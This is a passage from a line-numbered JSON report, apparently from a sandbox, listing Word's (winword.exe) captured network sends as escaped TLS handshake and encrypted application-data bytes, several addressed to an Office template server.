  423.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04@\\x82\\xd0\\x85j\\x8a\\xf8\\x98 \\xe8(\\x1bw\\xbb[ \\xaf9\\xdf\\x1e\\xea#\\x19gm?\\x1b\\xa3`\\xb1\\xea\\1\n\\x13y0n86\\x83\\xbf|\\xef\\x84\\xf5\\xe8\\xca\\xd9\\xc5\\x9a\\xb0p\\xc3\\x14\\xed\\xef\\x04t\\xcb==\\x99\\xc1\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xce\\x18zy\\xf0.\\x1ew\\x98\\xe4\\x9a|3\\xf7>\\xe8\\xcf\\x96\\xb6\\xc5\\xb3\\x92\\x1b\\xe8\\xd0\\x9d\\x87\\xc4\t\\x0c\\x061l\\xe0\\xed\\x8e\\xc0\\xe3\\xcb\\x1f%\\x14o\\xe1\\x8f\\xd6#e"
  424.             },
  425.             {
  426.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04b~)\\xa8\\x9c[\\x9b\\x11\\x93\rg4\\xe7\\xb2\\xc7kga\\x86\\xc8\\xed\\x01\\xe27\\x0b>\\xf2\\xef\\xf5\\x8e.\\xe9\\x1b8m\\xbe\\xa7\\x11\\x92\\x96\\x9a\\xd3\\x9a_bo\\x12\\x15\\xbb\\x01\\xa3\\xd8\\xae}\\xc8\\x86\\xa4\\x13\\xb0\\xff\\xc0t\\xb9j\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x91f#\\x0ec-\\xee\\xb2\\x8b_<65\\x01g\\x02\\xbb\\x8a\\x18\\x0c1\\xe9r\\xda\\x14\\xef6\\xdd#5\\x95\\x88p}\\xb2\\x05w\\x89j\\x0bl\\xa9m\\xc8\\x16\\xcb\\xc9\""
  427.             },
  428.             {
  429.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x84*\\xa3\\xd2\\xadv\"\\x9a\\x02x\\x9f\\x8f\\x04\\xc7o\\xa1\\x1f?\\x05\\xa9l\\xb9\\xa5\\xeb#\\x11.x\\xd2\\x83\\xfb\\x0e\\x82\\x8b\\x17 \\x10\\xdd\\x99{\\x14\\xe3\\x9c\\xe4z\\x1b(f\\x14)^\\xf2\\x8d\\x03\\x1f\\x02z\\xd3\\xedia\\xfe\\x9dl\\xf1\\x91/\\x94\\xb0\\xc5\\xc4]u\\xae\\xa8\\xf9\\x19\\xfc\\x1a\\x1b\\x82\\x98z\\x1b4\\x08\\xbbs\\xb6\\xf0\\xed\\xa8\\xa5\\x84\\xa7\\x1c\\x7f\\x87\\xd0'x\\xb4535\\xe0\\x9d\\x9c\\x17h\\x9a=%\\x03\\xe6\\xe1{c82\\xac\\x86\\xb2\\x7f\\xab\\x9d\\xe7\\xfbu\\xc8\"\\x08\\xdb\\x99)\\x8fhrn\\xc2f\\x14\\xd8\\x1a\\xb1m\\x0c\\x04/\\x8dm\\xe0\\xf7\\xc8\\xd5f\\x9b\\xa64v\\x17i\\x89\\xe9\\xce\\xc3\\x8b\\xfco\\xcey\\xa9@\\x9a\\x01\\xa9h\\x87\\x98\\x81g&\\x0bu\\xdf\\x161\\xb5w\\x97y\\x8c?x\\xfen83\\xc2\\x11\\x955\\xb1|d\\xe11$m\\xed\\xff\\xadd\\xfbjeck\\xf8\\xfd\\xc9\\xbcf\\xff\\xc8\\xf5\\x0f\\x04j\\x9a&\\x94\\x1c\\xcai\\x02\r^\\x1b|\\xd8t>5\\x133\\xe7\\x1c\\x92\\x00;"
  430.             },
  431.             {
  432.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010a\\xe5\\x0ef=\\x1c\\xfe$b$\\xb0\\x94w\\xda\\x11\\x9bz\\xb1\\x0f.\\xbc\\x90=[j\\xbe\\x16g\\xdb7=\\xf5<g\\x9d\\xdb\\xda\\xca/\\x9cu\\x88e\\x05\\x8e\\x83\\xd4\\xc6}a:\\xae\\xc5\\xae\\xf5\\x0f\\xd5\\xc3o\\x86\\xa6\\xa1\\xc0pn\\xb7\\xc1\\x9e\\x9b=\\xf0\\x9b\\xe9\\x88\\x04\\x8b\\x96\\x98k\\xe7\\xce`-\\xc2\\xd6\\x82\\x85r\\xc3\\xfbi?|\\x02m\\xfe\\xb3\\xe4@\\xd2\\xd8\\xf9\\x9da\\x88k\\xa4\\xf2\\xc4\\xe0\\x8f\\xe3\\xba\r\\x13\\x1f\\x17e\\xdc\\xf55\\xfa\\x9b\\xb8e\\x16\\xf8\\x1f\\xf2#\\xd9\\xb1\\\\x90!\\x11\\xdbg\\xac\\x1d\\xc4\\xab>\\x0b\\x8dn\\x1c\\x8da\\xcf@\"\\x8bh\\xcek{\\xf5\\x9a\\xb4q\\x1c@k>\\xc3\\xfb\\x84+s\\xe2\\xc7\\x8b\\xd5js\\x99\\x16\\xebmt\\x91\\x87\\xc2\\xa6\r\\x9e\\x8e\\xa4s\\x9e.dp)\\xf6\t\\xd7\\x84\\xe5\\xd9]\\xc0\\xfc\\xf7na_\\xf14{e\\xe6\\xf6\\xdd\\x12\\xbb#\\x8e\\xa9\\xc4kbw\\xe2\\xfae0zm\\xacmi\\xb0\\x96\\x93\\xd0\\x96co\\x7f\\xdd\\x84\\x86\\xc5\\xca\\xa8\\x02?\\xf5\\xd9"
  433.             },
  434.             {
  435.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010`\n1\\xd5(=\\x021\\xba\\x13\\xaajo}\\xd3\\xa3\\\\xe0\\x8f\\xfb\\xbd\\xfd\\xbc\\x81\\xba\\xa6\\xda\\xc9\\x00\\x8f\\xffdk\\x82$\\x00@\\xed\\xb5oz\rb\\x82\\xef\\x9c(}t\\xd3-\\xf5bp\\xd1\\xd8\\xfb{\\x98\\xd4\\xcd[p?\\xc9\\xe9\\xd4\\xe0\\xda\\xa6c7u\\xf7?\\xaf\\x11\\x8f'\\x18\\xf2\\xbf\\xc64fm\\x18qt\\xb1j \\xe5\\x8f2\\x9b\\xf4\\x1f\\x7f\\xc8;\\xc9%\\xf6\\xa9n\\x9a7\\x9a\t\\x990p\\xa0e\\xb4\\x08\\xa8\\xb3\\xa0\\x11b]\\xda^=e\\xb7\\x10\\xbe\\xe6l=%\\x82i^#\\x90\\xaa\\x94k5n/\\xc9\\xc0\\xc4_\\x9f\\xac\\x9etl\\xa9+qx\\xe7\\xda\\xae1\\xf7/\\xba'hrwvb\\x14\\xb1\\xa9.\\x88c\\x98\\xdd\\x93\\x84\\xa9\\x0b\\xc7le\\1\\xf0\\xf2\\xc66^\\xa6mepa\\xe67\\xa7\\x90\\xa1\\x1csw\\x1cz\\xeb2\\xd6do\\x07o\\xae\\xde\\xbe\\xd7>\\x0bm|m\\xab-\\xbd\\xf8^n\\x82\\xb2\\xcd\\xf5zf\\xbd\\xf9\\xd3\\x04d\\xc3\\x88s\t\\xad\\x92g\\xc4\\xef\\x9a"
  436.             },
  437.             {
  438.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xa0!\\xea\\xd3$'\\x8fv\\x08\\xfam\\x1a?\\xc7\\x8d\t\\xd2m\\xa0\\xec?\\xc3\\xc7\\xd3/\\xa8\\x04\\xd7gb_\\x85\\xbd\\x9f&\\xe0\\x91\\x92`\\xb1\\x024\\xee\\x1d\\x13z\\x9a\\x88\\x135\\xaf\\xe0v\\xf4\\x9d?\\x91{d\\xde\\x1d\\xf0\\x05\\xed\\x8e\\xaf\\xd8;^l\\xbc\\x97\\x92\\xc7\\xb7(\\x07\\xcf\\x87l>\\xb6x\\x16}\\x86\\xde\\xd9\\x1e\\xa7\\xb9\\x9fy\\x0e\\xbe\\xcf\\x19~a\\x14\\xce\\xdd\\xc4p\\xcc\\xd9\\x00\\xde9\\x04\\xb7\\x88\\x0c\\x93\\tf\\x856f\\xe7rqjvg\\x99{c\\xd8\\xe14\n\\x85o\\xf5\\x12\\xe7\r;\\xac)\\x11|,\\xc8!\\xe9\\xdc\\xe3\\xb0\\x95\\xe7\\xcd\\xba\\x1f\\xd3\\xfad\\xc0\\xe8\\xa7\\xa5\\xb2qb\\x91\\xa7n\\xde\t\\xd8\\xe7&\\x8c\\xeb\t\\xd8\\xe4^\\xbd\\xe9\\xa2\\xa2\\xc1\\xad]\\x14\\xd0n\\xc3\\x0f\\xac\\x0c__j\\xfd\\x1d\\x98\"\\xa0o\\xb5\\x0e\\x10\\xbc,\\x07\\x19m\\xb8\\xc5a\\xdcf}odg\\xf8\\xf2*f\\xf7\\xd6\\x90dn\\x05e;\\xd8cewfo\\x109kh\\x8d62oz\\x91x\\xd5="
  439.             },
  440.             {
  441.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb1\\x90\\x81\\x929\\x8a\\xab\\xc6\\x17t\\xe7'\\xfcqps\\x17\\x95(\\x0fk[\\xf6\\xfb\\x03:\\xb0\\x15\\xb3\\x0f\\xec\\x8b\\x14\\xfd+d\\x08\\x01\\xcc\"9\\xc1\r\\x0c\\xcb\\xd4\\x82=/\\x854d\\xfcmd\\xc4\\x05\\xa0\\x02ej\\xae\\x98\\x8e\\xda\\x18)^!\\x86\\x813\\xe1\\x04\\x8cmh*r\\x96\\xf9\\xd7\\xe8\\xf2\\x16zh\\xd3\\xf4aq=\\x94\\x85kx\\xd2\\xfeg^\\xd3\\x9b\\xed\\x07\\xc6h\\x19s\\x87`.f\\xa5!\\xf3}94\\xca\"q\\xf3\"\\xb8)\\x0ezha\\x7f\\xb0\\xd2\\x1bo/m \\x03u\\x0f\\xebw\\xe0xzg\"\\xf9\\xb1jx\\xcb\\xf6\\xb7\\xb8\\xe0\\xc6\\xe8\\xad\\xc7\\xc7\\xafl\\x1ff\\xbc@@\\xa3vt4\\xa0\\xbc\\x12\\x95\\x91%\\xae\\xf2\\xe4]\\xc3\\x9b\\xb1\\xc4\\x07\\xcc\\xcaj\\xfe\\x19br\\xba\\x82\\xffy)\\xc6\\x18\\xb7\\xe4\\x92\\xd7\\xd6\\xdb\t\\x98\\xe6l@\\x7f\\xcf\\x94\\xe6\\x9b\\xed\\x8c:s:\\xb4\t\\xbad\\xf6#9\\xd7\\xdb\\x00}\\xa8\\x91~0\\x04\\x13\\xdb\\x95\\xe1\\xd3\\xfc\\xc7\\x1a'\\x90(u\\xdb"
  442.             },
  443.             {
  444.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb3h\\x8f\\x94\\xb6j\\x1c\\xe2\\xbc\\xde:\\xc0\\x82\\x97\\x82b\\x8e\\xdc\\xd5\\x8c+\\xea>\\x13\\x8f\\x82z\\xed\\xe1\\xc03\\xf0\nx\\x869\\x00\\x80\\xd02\\xcd\\x11\\xee8\\xd4b\\xbc\\xd8\\x0e\\x01\\xbb\\xa5\\x10\\xd7\\xd3.&\\xac\\xd7\\\\xd4\\xb38r>\\xd4\\xfa`&\\xf2\\xb9\\x0c\\x92v\\xb5\\xb3;\\xda`\\xa2\\xb6\\xfann\\xc1c\\xee\\x89\\xbd\\x08\\xca5\\xe4\\xee\\x9f\\xfd\\xb3\\x94\\x99\\xe9\\xfak\\xa5\\xe7\\xc0)\\x9d\\xcc:/k\\xff\\x1b\\xb0\\xd3\\x92\\xdb\\x12_<b_\\xb9\\x07\n\\xb5f\\xd0\\x05\\xed\\x04i*\\x99\\x84\\x00\\x81\\x90h\\xc6\\xa6\\x98\\xd2\\xe54\\xf6-\\x8e\\xe9z2=ta\\xe8\\xf7\\xc7x\\xd0\\x9b\\xedj~\\x16\\xb8\\x08\\xcc\\x10\\xab\\xaa\\x0c\\xd5ipk\\xf7\\xedg<\\xcai\\x83\\x81\\x91\\xff\\xc4\\xdak&\\xc7>fc+\\xbck\\x1d\\xce\\x7f]$q\\xeb\\x8c\\xcb\\x07c[\\xd5\\xa3\\xdd\\xb2f\\xd6y!\\xe7o\\xda\\x1b{\\x82\\xe7\\x942\\xef\\xec\\x97\\xcbl\\xb8rbv\\xdd\\xa7\\xa7\\xa3\\xde\\x90zom\\xcb|\\xa9\\xe9k\\xf6'\\xdc"
  445.             },
  446.             {
  447.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x10u\\x04\\xa8\\x93\\x9f@y\\x86\\xc2\\xb9\\xf3\\xb1\\xefa\\x0cr\\xadk\\xf6\\xff\\\\xede\\x0f\\x9ax\\xab\\x86>f\\xf2\\xee\\x91\\xc3a\\xb4\\x18\\x02\\x8b\t\\xc7g\\x1a\\xf3\\xdfg1\\x1c\\xabhl\\xd0\\xcd\\xfda3\\x85{v\\xc8\\xe2-\\x80\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x1ay\\x0f\\xd1\\xc7\\xf6@\\xa0\\xa6;\\x1aj\\x8d!q\\x1f\\x87\\x1cs\\xf5m/\\x90\\xe3\\xeb\\xff\\xe5jg\\xa8\\x81\\x8d\\xdff\\xdf\\x85\\xedz\\x8a\\xf0\\xb7)\\xac(\\xc1\\xb5\\x96\\x0f"
  448.             },
  449.             {
  450.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04mo\\x82\\x0f\\x91-z]\\xbf,\\xe6\\x8coe\\xfey@\\xb0\\xffi\\x0cj\\x96!\\x9a\\xc3\\xcf\\xb3\\xbc\\xaf[[\\x9d\\x87\\x9ba\\xe4\\xcc\\xfa\\x968_v\\xb4ri\n\\xe4}\\x86cd\\x90\\xa0\\xf0\\xec\t\\xfd\\x99p\\x13v\\xb4\\xf2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x9b\\xb2\\xb7\\xfa~\\x91/y\\xd6\\xcf:\"\\x18\\x1d\\xd1_(=<s\\x1b\\xa6\\x89\\x1d\\x80ewm\\x1au0k\r\\x08\\x99/\\xd0}\\xf2&2\\xfb_o\\xcc.\\xa3\\xc8"
  451.             },
  452.             {
  453.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\x16\\xfb\\xcd\\xf6\\xd8;\\xcc\\xe31\\xca\\xcf\\xd9\\xad$\\x80\\x92%\\x96\\xcdl ^\\xe6\\xff8\\x7f\\x12\\x83\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  454.             },
  455.             {
  456.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\xb5a\\x9f\\x04\\x14\\xf0\\x1cx\\x9f\\xd4y\\xae\\xf7\\xb4of7\\x83\\x97)\\xfc\\xbb\\x93\\xad\\xa7;\\xed\\xa0\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  457.             },
  458.             {
  459.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x10\\xdb\\xbf:g\r\\x9cx7\\xf2\\xbb\\xb1\\}\\h`\\xb8\\x13r\\xfc\\xbb\\xce\\xeb\\x91\\x85\\x82w\\x01\\xaca@\\xf3ur\\x05s\\x96q\\xfb\\xf0\\xf9\\xb7/\\xc2\\x08\\x8d\\xf2\\xe3k\\x9a\\xf5\\x9a\\xb9\\xe0\\xc0\\xd8\\xcd'\\x06\\x9b\\xca5;\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfcz\\x8e\\xac\t\\xdc\\x06\\xac\\xb7\\x17\\x9d\\x08_\\xd4\\x9f\\x97x\\xfegn\\xd7y\\xfes\\x1c\\x04\\x17\\x19k_a\\x97\\xea\\xddu\\xe9d8\\xb9\\x94\\xd4\\xd5s\\x9b~\\xb4\\x97@"
  460.             },
  461.             {
  462.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04plv/li\\xcf2h\\x86\\xa9\\x80\\xdc\\xba\\xa3\\xd3\\xc6\\xa2\\x1f\\x96\\x9c}_p\\xff\\xe0\\x8fyf\\x81'\\xcb\\xbfq\\x8f\\xf30\\x9e\\x88*\\x87\\x81j5\\xabu|\\xb8\\xa7\\x97\\x83\\x16bdp\\xd0n0\\x86\\x98*v\\x94\\x17\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000x\\x1c\\xdft\\x9f\\xacz\\xc4\\x05\\x9ef\\xc3\\xd9\\xf0d[\\x0co\\xe2\\xa67\\xd6\\xd7\\x16`)\\x15\\xbc\\x84\\x1ay\\x85\\x97f\\xab<\\x12\\x8e\\xf3l\\xdf\\x19\\x15\\x89\\x13f\\xfc|"
  463.             },
  464.             {
  465.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\nr\\x01\\xe4?\\xb4\\xce\\x1f\\x8e &+\\x05\\xc25\\xbd`\\xbd\\xd0+\\xc2\\x80h4-/-\\x83\\xa4\\x9b~\\xc2w_\\xe8/\\xe1\\x96?\\xf8`\\x8a\\xc8kr6e|n'\\x8b\\x8du8\\xa6\\xdfv{\\xd1p x\\xf0n\\xa9\\xde\\x0e\\xa1\\xab\\xca\\xbf\\x83n\\x94\\xa0tb\\xb6ztk\\xf7~\\xe6zp\\xa7x\\xder\\xcc\\x977\"\\x10f\\xba\\xad\\xc9\\xcau\\x89\\xaahw7\\xa2\\xae0\\xb0?\\x9c\\xd2\\x07\\xed\"bf\\xc2\\x8a\\x16\\xba\\x14\\xa0~\\x9f\\xed\\xbdodl\\xf7\\x17l\\xb0\\xdbm\\xa6\\xad\\xf3\\xb0\\x11@z\\xee\\xd7gu\\xd5\\x88\\xeb\\x9c\\x87\\xfb\\x96r\\xa0\\xee\\xb3\\x87\\x84'\\xafiz\\xf9\\xef\\x81ur8\\x8c\\x0bl\\x90\\xdf\\xd4\\xaf?\\xf4\\x85\\x1c\\x877\\x1f,}\\x89\\x86\n\\x9cs{\\xb8?\\xa0\r\\xc3\\xbb=\\x17\\x82 m\\x05}\\xf7\\x02fa\\xab\\xe7%\\xc5\\x1cs{_\\x87\\xbf\\xd7h\\xa6\\x1f\\xc2cp\\xb3\\x9e\\xa8\\xa4\\xaf$mnm\\xbe\\xafh\\x89x\\xb2\\x11\\x1f\\x14e\\x0c\\xcc\\x13\\xa0]"
  466.             },
  467.             {
  468.                 "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb9\n\\x98\\x95e\\xd9f\\xa8fy\\xa3|qt\\x0bkj\\xe7qnkz\\xf5<\\xb1\\x11d3\\xd9\\xe29\\x1f\\xea\\xae\\xda\\x8b\\x95\\xc2\\xa5\\x9bd\rv\\x1e$:\\xf5\\x81z6\\x8e#\\xb4\\xfd\\x8a@\\x02\\xce\\x91>\\x85~\\x83joo\\xa0\\x99\\xad\\xc9|\\xd7\\xa4\\x9e>\\xac\\x9d$\\xbe}dv\\x19\\xf8\r\\xb9\\xfdf\\xaa!\rf\\x1e.\\xc9\\x0c\\xa6\\x86\\x1f\\x17b\\xf8\\xd7\\xfc<x\\xa1\\xca\\xfc\\x90\\x0e\\xb1\\xadt\\xc2[\\xc0\\xbe\\xd91\\xd0\\xd9 pi\\xd9l\\xf6\\x97\\xbb0f\\x15\\x06<m\\xdb\\x08\\x12\\xf0\\xa2\t\\x8a\\x81\\xa1\\xa456\\xc5\\x7f\\xf4\\xceu<\\x7f\\xb3\\x85\\xe9\\xac\\xbfa4\\xfca\\xa2{4fcm\r\\xca\\x89\\xc0\\xae\\xc1\\x87\\x19\\xc8l\\xec/$ki}\\x83!\\x85\\x96\\xb6\\x9bh\\xbb\\x80o\\xd5\\xe2:x\\xf3\\\\xcda\\x99:\\x908%\\xb7\\x17d\tfvz\\xa6\\xb2<\\xc0#0\\xb2\r\\x18`\\xf56\\x15\\x12\\x05\\xd0w\\x9b]+\\xd3\\xcey!\\xcfo\\x9ec<\\xbd^\\x1b\\xa21\\xbb"
  469.             },
  470.             {
  471.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e\\xf2\\x06x/\\xf8\\xe1\\x80g\\xe1\\xd1g\\x94\\x8cp\n\\x97\\x02\\xcd\\xc3\\xd9\\xb6\\x18\\xff\\xbd\\xf46\\xc1\\xce\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  472.             },
  473.             {
  474.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xdf\\xa9\\xc1\\xea)b\\x90\\xc2:2\\xa0~h\\xd1\\xc5k8\\x8d\\xedm\\xbe\\xd3j\\xc6>*\\x81\\x13\\x84\\x83\\x15\\xa13!8w\\x90\\xf5\\xd7\\x93\\xc9\\xd3\\xcdl\n&\\xce\\x85\\x96j_(\\xd1j:\\x03\\xe2j\\x1b\\xed>\\xd4\\xecw\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x16\\x7f)\\xac\\x02\\xb8\\xa1\\x87z1\\xd4&\\xbaw;\\xa2\\xf9\\x99w\\x14,ax\\xc3\\x99\\xd6\\xf2\\xb9\\xcf\\x0e\\xc7a\\xd9\\x85\\x1e\\xc0\\xe5\\xb6uglf*\\xa9b\\xd3\\x00|"
  475.             },
  476.             {
  477.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1e`\\xf0\\x82\\x0f\\xa0b\\xecomkq\\x98\\x08\\\\xdd\\xe8\\x08\\xf8\\x92\\x90\\xe6\\xdb\\x8b\\x7f\\x84\\x88h\\x8a\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  478.             },
  479.             {
  480.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1ev\\x8e\\xc0\\x83\\xef\\x1bi\\x86\t\\xc1'\\xe7n<\\x9api\\xc7bi\\x10\\xa4\\xca\\xc3\\xbf\\xf2bj\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  481.             },
  482.             {
  483.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb5l\\xff\\x8e\\xe6\\x92\\x02qhj\\x89m\\xf7\\xe7\\x95\\x19\\xf2m\\x05\\x83 \\x8c\r\\xa4\\xcab\\xa0twk\\x833\\xea\"\\x08\\xb0\\xdc\\xb2\\x8bi\\x05\\xed\\x16\\x00e\\x11,\\x7f\\xea\\xe8f3\\x1d&\\xf2\\x89;\\xe4r\\xe9\\x8e\\x00?\"\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x9do\\xfa\\x8a\\xf1\\xa8\\xc9\\xc5ky\\xab\\xb5;\\x8bi?a\\xdc\\x80\\x81\tyw\\xbas\\xa2qvt!\\x13\\x8c\\xf3o\\x93#*\\x88\\xd5\\xb4\\xef\\xe5eu\\xb8\\xcc\\x12\""
  484.             },
  485.             {
  486.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04ruj\\x95\\xf8\\x15\\xe29\\xaa\\xa7\\xcbh\\xa6\\xefj\\xbd\\xda\\x94\\xfa\\xb6\\xc2\\xe6'\\xf1\\xc21m\\xea\\xbad\\xd9\\\\x819l\\x9c\\xe0'\\x95\\xee\\xdc\\xd8\\xbe(\\xa01v\\xc3\\xb07\\xa7\\xbc\"s\\xd3\"j\\xee\\xd5%\\x1f\\x9f\\xb4\\xe7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x12r\n\\xd4sh\\xfd\\xe8\\xf3k\\xc2\\x94{\\xf0[\\x97\tt\\x99\\xd93]\\xf9\\xae\\xea\\xdad\\x8a&\\x13e\\xe9n\\x15a\\xc0\\xcb\\xfdv\\x9bb\\x8d(\\xb2\\x97\\xe4\\xb6("
  487.             },
  488.             {
  489.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04>g\\xad\\xac\\xec\\xbdv?:e\\x95\\x1a\\xa4up\\x1a\\xd2#\\xb9h\\x03\\x0cc\\xbf\\x8f^\\xb5\\xaa\\xcf\\xf3\\x97\\x07\\xb0l\\xe9\\xc6:pt\\xbc\\xfc(d\\xba\\x05\\xcd\\xc7+x\\x81mz\\xda\\xe3\\xda\r\\x8c?t\t\\xaf\\xa5}\\xd4\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe2|\\xf7g>/\\x8b\\xc8$a\\x8e\\x86i\\xfd#\\x84\\xbe\\xa4\\xacy\\xfeb\\xcc3\\xcf\\xc9@l\\xc7\\xc8$\\x1f\\xf2y5~\\xe6\\x94\\x7fo\\x11{\\xab\\x1f\\xa7\\x00\\xd8$"
  490.             },
  491.             {
  492.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01]\t}\\x1f\\xd5\\xa7\\x94\\x83\\xc6\\x0c\\x01\\x06\\xa2\\xcdy\\xec\\x08q\\x14n\\xa8\\xbf\\x05\\xb1\\xccv\\xa6x\\x9b\\x18\\x80\\xa9\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  493.             },
  494.             {
  495.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04h\\xc7\\x7f&k\\xb9^\\xde\\xf0\\xbe\\xfb\n\\xbb\\x1c\\xf6\\x88\\x96>\\x85\\x0c\\xbbu\\xce\\xda|\\xb6`\\xe6\\x89c\\xe5>\\xf4n\\x17b!\\x93\\x08d\\x12{o\\xd1q{\\x05m$k\\x1b\\xfbo\\xab*[\\xd57+\\x06\\xac\\xb8\\xfab\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000q\\x84\\x0e\\xf7\\xb0\\xe2\\x00\\xef\\xd6%m\\xee;\\xd5\\xbb&\\x8c\\xee\\x0et\\xdb\\x83=\\xe2?\\xf7\\x15\\xd3\\xef,\\xd1\\xd2\\xbdb\\xdf\\x00+\\xae?\\x0c,\\x82\\xf8\\x1e\\xb2>%u"
  496.             },
  497.             {
  498.                 "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xbe\\xee\\xb6p\\x88,\\x90\\xea\\x872\\x00i\\xe5\\xac\\xae\\xc33\\x94\\xda*i\\xf5\\xb8\\xd0\\xa9\\x13\\x9edp\\xb9\\x0ey\\xec+\\xf1\\xa5\\xabu\\xb2\\xbb=\\xb2w\\x81\\x0702\\xe8\\x16k:wt?q\\x8b\\x0f}\\xdb\\xf3\\x007\\xb2b\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x90@\\xd1\\xdd\\x90\\xc5}\\x9e\\xa3zq}<\\xba\\x8a\\xd0\\xc9\\xc0\\x9e\\xcf\\xe3\\xbfkuc\\xd1k\\xd7*!\\x97n\\xbbx\\x8e\\x94q\\x1d\\x02\\xaa\\xbd\\xa8\\xa8\\xcbl\\x92-$"
  499.             },
  500.             {
